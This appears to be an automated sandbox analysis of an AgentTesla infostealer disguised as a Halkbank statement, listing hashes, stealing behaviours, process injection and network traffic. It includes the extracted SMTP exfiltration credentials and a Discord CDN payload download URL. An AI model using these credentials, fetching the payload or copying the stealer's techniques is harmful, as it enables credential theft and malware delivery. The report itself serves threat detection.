Analysis

  • max time kernel
    92s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/09/2024, 10:50 UTC

General

  • Target

    Halkbank_Ekstre_20240922_080921_689429.exe

  • Size

    110KB

  • MD5

    c8cea26640b2fa181571afd43c2e4477

  • SHA1

    5b9e511450b327634fcc620814ebf42cb57b0c91

  • SHA256

    261f4e785355cfd784f655fe0fc4a67be3cc18bb09e742b0187cfcc284fa5240

  • SHA512

    20d9aca79e7034fdd1dbd2b785af17f973c0b9a2ab38dd40338dc0217754d2ea1fd6f00ad9d60bf761dc9d8c135acf32ebd9064facc3e0f3dc9790c3cbd00212

  • SSDEEP

    1536:Y48kc/9ORkoOQzhSppeT//142G1Fq9uelIA630VDx:8kE9OuDp21DiqAEVDx

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.zqamcx.com
  • Port:
    587
  • Username:
    server1@zqamcx.com
  • Password:
    Anambraeast@
  • Email To:
    server@zqamcx.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe
    "C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
        PID:2228
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3756

    Network

    • flag-us
      DNS
      97.17.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.17.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      cdn.discordapp.com
      Halkbank_Ekstre_20240922_080921_689429.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.129.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.134.233
      cdn.discordapp.com
      IN A
      162.159.133.233
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
      Halkbank_Ekstre_20240922_080921_689429.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a& HTTP/1.1
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Mon, 23 Sep 2024 10:50:54 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 327008
      Connection: keep-alive
      CF-Ray: 8c79f9fa6acb657a-LHR
      CF-Cache-Status: HIT
      Accept-Ranges: bytes, bytes
      Age: 10252
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment; filename="kingggggme.txt"
      ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
      Expires: Tue, 23 Sep 2025 10:50:54 GMT
      Last-Modified: Mon, 23 Sep 2024 07:59:58 GMT
      Vary: Accept-Encoding
      alt-svc: h3=":443"; ma=86400
      x-goog-generation: 1727078398052007
      x-goog-hash: crc32c=F3gHFg==
      x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 327008
      x-guploader-uploadid: AD-8ljuSgJeARyAKoFDsjKGCmnOLdW0aNJZzRI-XUBfMXltfgMk3zNRc58-0aFwDSDQQW9Hc4x64KlpuOQ
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Set-Cookie: __cf_bm=ryzA49SewVzWDV286kJY8giDpd9I0mPPFZwiKFheuEc-1727088654-1.0.1.1-LYYN2ERS7ejorfrWQoGTa_tTXaiChzg4jR5gQ.nh2KjhEZYOp1yriUQ_HSqcu_GUx5dxdkKr70PWb9pPwKMWjQ; path=/; expires=Mon, 23-Sep-24 11:20:54 GMT; domain=.discordapp.com; HttpOnly; Secure
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B80oVC7ZhyOH%2BIaZKvEBL7BAlZUO6vehSqBZAOruPVJv0Z9LpQKcnyKdXFVe3CWw7U7SQhp%2BDKFbJKArcnt3l%2Bu%2BWyXoXXem47glAlSO6Ji%2FxhWDALsG1Lw8vu3WghCUMbk%2BVg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Set-Cookie: _cfuvid=9lcmFL1wc_oHSiDQ9FdhBI3tv6ltb4s9eWJwaVneoCM-1727088654532-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
    • flag-us
      DNS
      25.140.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.140.123.92.in-addr.arpa
      IN PTR
      Response
      25.140.123.92.in-addr.arpa
      IN PTR
      a92-123-140-25.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      233.135.159.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      233.135.159.162.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ip-api.com
      RegAsm.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/line/?fields=hosting
      RegAsm.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /line/?fields=hosting HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Mon, 23 Sep 2024 10:50:56 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 6
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      1.112.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.95.208.in-addr.arpa
      IN PTR
      Response
      1.112.95.208.in-addr.arpa
      IN PTR
      ip-api.com
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      73.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.190.18.2.in-addr.arpa
      IN PTR
      Response
      73.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-73.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      14.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
      tls, http
      Halkbank_Ekstre_20240922_080921_689429.exe
      7.3kB
      344.8kB
      147
      261

      HTTP Request

      GET https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/line/?fields=hosting
      http
      RegAsm.exe
      356 B
      347 B
      6
      4

      HTTP Request

      GET http://ip-api.com/line/?fields=hosting

      HTTP Response

      200
    • 8.8.8.8:53
      97.17.167.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      97.17.167.52.in-addr.arpa

    • 8.8.8.8:53
      cdn.discordapp.com
      dns
      Halkbank_Ekstre_20240922_080921_689429.exe
      64 B
      144 B
      1
      1

      DNS Request

      cdn.discordapp.com

      DNS Response

      162.159.135.233
      162.159.129.233
      162.159.130.233
      162.159.134.233
      162.159.133.233

    • 8.8.8.8:53
      25.140.123.92.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      25.140.123.92.in-addr.arpa

    • 8.8.8.8:53
      233.135.159.162.in-addr.arpa
      dns
      74 B
      136 B
      1
      1

      DNS Request

      233.135.159.162.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      ip-api.com
      dns
      RegAsm.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      1.112.95.208.in-addr.arpa
      dns
      71 B
      95 B
      1
      1

      DNS Request

      1.112.95.208.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      73.190.18.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      73.190.18.2.in-addr.arpa

    • 8.8.8.8:53
      14.227.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      14.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/3592-5-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

    • memory/3592-1-0x0000000000050000-0x0000000000074000-memory.dmp

      Filesize

      144KB

    • memory/3592-2-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

    • memory/3592-0-0x0000000074DBE000-0x0000000074DBF000-memory.dmp

      Filesize

      4KB

    • memory/3756-7-0x0000000005760000-0x0000000005D04000-memory.dmp

      Filesize

      5.6MB

    • memory/3756-6-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

    • memory/3756-3-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/3756-8-0x0000000005130000-0x0000000005196000-memory.dmp

      Filesize

      408KB

    • memory/3756-9-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

    • memory/3756-10-0x0000000006560000-0x00000000065B0000-memory.dmp

      Filesize

      320KB

    • memory/3756-11-0x0000000006650000-0x00000000066E2000-memory.dmp

      Filesize

      584KB

    • memory/3756-12-0x00000000067F0000-0x00000000067FA000-memory.dmp

      Filesize

      40KB

    • memory/3756-13-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB
